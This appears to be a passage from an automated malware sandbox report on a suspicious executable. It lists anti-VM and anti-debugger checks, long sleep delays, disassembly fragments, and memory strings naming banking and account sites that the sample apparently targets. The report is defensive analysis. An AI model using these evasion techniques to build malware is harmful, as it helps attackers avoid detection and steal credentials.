                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Zjf9D3oDifslon7.bat.exe PID: 5628, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: 4D60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: A530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: B530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E rdtsc 5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5220Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 615Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 9818Jump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.9 %
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe TID: 5396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7736Thread sleep count: 154 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7736Thread sleep time: -308000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7736Thread sleep count: 9818 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7736Thread sleep time: -19636000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792Thread sleep time: -64500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792Thread sleep time: -43000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5C3D0 FindFirstFileW,FindNextFileW,FindClose,12_2_02B5C3D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 728o34HL.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 728o34HL.12.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 728o34HL.12.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 728o34HL.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 728o34HL.12.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: firefox.exe, 0000000F.00000002.1717279511.00000206E895C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT{
                Source: 728o34HL.12.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FEE000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3723268950.0000000000A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 728o34HL.12.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 728o34HL.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 728o34HL.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 728o34HL.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 728o34HL.12.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 728o34HL.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 728o34HL.12.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 728o34HL.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 728o34HL.12.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 728o34HL.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 728o34HL.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 728o34HL.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E rdtsc 5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004178B3 LdrLoadDll,5_2_004178B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FC188 mov eax, dword ptr fs:[00000030h]5_2_018FC188
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FC188 mov eax, dword ptr fs:[00000030h]5_2_018FC188
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01880185 mov eax, dword ptr fs:[00000030h]5_2_01880185
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4180 mov eax, dword ptr fs:[00000030h]5_2_018E4180
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4180 mov eax, dword ptr fs:[00000030h]5_2_018E4180
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C019F mov eax, dword ptr fs:[00000030h]5_2_018C019F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C019F mov eax, dword ptr fs:[00000030h]5_2_018C019F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C019F mov eax, dword ptr fs:[00000030h]5_2_018C019F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C019F mov eax, dword ptr fs:[00000030h]5_2_018C019F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A197 mov eax, dword ptr fs:[00000030h]5_2_0183A197
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A197 mov eax, dword ptr fs:[00000030h]5_2_0183A197
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A197 mov eax, dword ptr fs:[00000030h]5_2_0183A197
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019061C3 mov eax, dword ptr fs:[00000030h]5_2_019061C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019061C3 mov eax, dword ptr fs:[00000030h]5_2_019061C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE1D0 mov eax, dword ptr fs:[00000030h]5_2_018BE1D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE1D0 mov eax, dword ptr fs:[00000030h]5_2_018BE1D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE1D0 mov ecx, dword ptr fs:[00000030h]5_2_018BE1D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE1D0 mov eax, dword ptr fs:[00000030h]5_2_018BE1D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE1D0 mov eax, dword ptr fs:[00000030h]5_2_018BE1D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019161E5 mov eax, dword ptr fs:[00000030h]5_2_019161E5
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018701F8 mov eax, dword ptr fs:[00000030h]5_2_018701F8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov ecx, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov ecx, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov ecx, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov eax, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE10E mov ecx, dword ptr fs:[00000030h]5_2_018EE10E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01900115 mov eax, dword ptr fs:[00000030h]5_2_01900115
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EA118 mov ecx, dword ptr fs:[00000030h]5_2_018EA118
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EA118 mov eax, dword ptr fs:[00000030h]5_2_018EA118
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EA118 mov eax, dword ptr fs:[00000030h]5_2_018EA118
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EA118 mov eax, dword ptr fs:[00000030h]5_2_018EA118
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870124 mov eax, dword ptr fs:[00000030h]5_2_01870124
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D4144 mov eax, dword ptr fs:[00000030h]5_2_018D4144
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D4144 mov eax, dword ptr fs:[00000030h]5_2_018D4144
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D4144 mov ecx, dword ptr fs:[00000030h]5_2_018D4144
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D4144 mov eax, dword ptr fs:[00000030h]5_2_018D4144
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D4144 mov eax, dword ptr fs:[00000030h]5_2_018D4144
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846154 mov eax, dword ptr fs:[00000030h]5_2_01846154
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846154 mov eax, dword ptr fs:[00000030h]5_2_01846154
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C156 mov eax, dword ptr fs:[00000030h]5_2_0183C156
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D8158 mov eax, dword ptr fs:[00000030h]5_2_018D8158
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184208A mov eax, dword ptr fs:[00000030h]5_2_0184208A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D80A8 mov eax, dword ptr fs:[00000030h]5_2_018D80A8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019060B8 mov eax, dword ptr fs:[00000030h]5_2_019060B8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019060B8 mov ecx, dword ptr fs:[00000030h]5_2_019060B8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C20DE mov eax, dword ptr fs:[00000030h]5_2_018C20DE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0183A0E3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C60E0 mov eax, dword ptr fs:[00000030h]5_2_018C60E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018480E9 mov eax, dword ptr fs:[00000030h]5_2_018480E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C0F0 mov eax, dword ptr fs:[00000030h]5_2_0183C0F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018820F0 mov ecx, dword ptr fs:[00000030h]5_2_018820F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4000 mov ecx, dword ptr fs:[00000030h]5_2_018C4000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E2000 mov eax, dword ptr fs:[00000030h]5_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E016 mov eax, dword ptr fs:[00000030h]5_2_0185E016
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E016 mov eax, dword ptr fs:[00000030h]5_2_0185E016
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E016 mov eax, dword ptr fs:[00000030h]5_2_0185E016
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E016 mov eax, dword ptr fs:[00000030h]5_2_0185E016
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A020 mov eax, dword ptr fs:[00000030h]5_2_0183A020
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C020 mov eax, dword ptr fs:[00000030h]5_2_0183C020
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6030 mov eax, dword ptr fs:[00000030h]5_2_018D6030
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01842050 mov eax, dword ptr fs:[00000030h]5_2_01842050
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6050 mov eax, dword ptr fs:[00000030h]5_2_018C6050
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186C073 mov eax, dword ptr fs:[00000030h]5_2_0186C073
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186438F mov eax, dword ptr fs:[00000030h]5_2_0186438F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186438F mov eax, dword ptr fs:[00000030h]5_2_0186438F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E388 mov eax, dword ptr fs:[00000030h]5_2_0183E388
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E388 mov eax, dword ptr fs:[00000030h]5_2_0183E388
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E388 mov eax, dword ptr fs:[00000030h]5_2_0183E388
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838397 mov eax, dword ptr fs:[00000030h]5_2_01838397
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838397 mov eax, dword ptr fs:[00000030h]5_2_01838397
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838397 mov eax, dword ptr fs:[00000030h]5_2_01838397
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FC3CD mov eax, dword ptr fs:[00000030h]5_2_018FC3CD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A3C0 mov eax, dword ptr fs:[00000030h]5_2_0184A3C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018483C0 mov eax, dword ptr fs:[00000030h]5_2_018483C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018483C0 mov eax, dword ptr fs:[00000030h]5_2_018483C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018483C0 mov eax, dword ptr fs:[00000030h]5_2_018483C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018483C0 mov eax, dword ptr fs:[00000030h]5_2_018483C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C63C0 mov eax, dword ptr fs:[00000030h]5_2_018C63C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE3DB mov eax, dword ptr fs:[00000030h]5_2_018EE3DB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE3DB mov eax, dword ptr fs:[00000030h]5_2_018EE3DB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE3DB mov ecx, dword ptr fs:[00000030h]5_2_018EE3DB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EE3DB mov eax, dword ptr fs:[00000030h]5_2_018EE3DB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E43D4 mov eax, dword ptr fs:[00000030h]5_2_018E43D4
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E43D4 mov eax, dword ptr fs:[00000030h]5_2_018E43D4
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018503E9 mov eax, dword ptr fs:[00000030h]5_2_018503E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E3F0 mov eax, dword ptr fs:[00000030h]5_2_0185E3F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E3F0 mov eax, dword ptr fs:[00000030h]5_2_0185E3F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E3F0 mov eax, dword ptr fs:[00000030h]5_2_0185E3F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018763FF mov eax, dword ptr fs:[00000030h]5_2_018763FF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A30B mov eax, dword ptr fs:[00000030h]5_2_0187A30B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A30B mov eax, dword ptr fs:[00000030h]5_2_0187A30B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A30B mov eax, dword ptr fs:[00000030h]5_2_0187A30B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C310 mov ecx, dword ptr fs:[00000030h]5_2_0183C310
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860310 mov ecx, dword ptr fs:[00000030h]5_2_01860310
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A352 mov eax, dword ptr fs:[00000030h]5_2_0190A352
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
